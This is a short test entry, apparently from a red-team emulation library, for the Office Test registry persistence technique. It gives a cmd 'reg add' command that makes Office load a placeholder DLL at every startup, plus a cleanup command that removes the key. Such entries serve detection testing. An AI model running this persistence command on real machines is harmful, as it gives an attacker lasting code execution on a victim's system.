#TechniqueName: Office Application Startup: Office Test
#AtomicTestName: Office Apllication Startup Test Persistence
#Description: Office Test Registry location exists that allows a user to specify an arbitrary DLL that will be executed every time an Office&application is started. Key is used for debugging purposes. Not created by default & exist in HKCU & HKLM hives.&
#Language: cmd

#commands
reg add "HKEY_CURRENT_USER\Software\Microsoft\Office test\Special\Perf" /t REG_SZ /d "C:\Path\AtomicRedTeam.dll"


#cleanup_commands
reg delete "HKEY_CURRENT_USER\Software\Microsoft\Office test\Special\Perf"

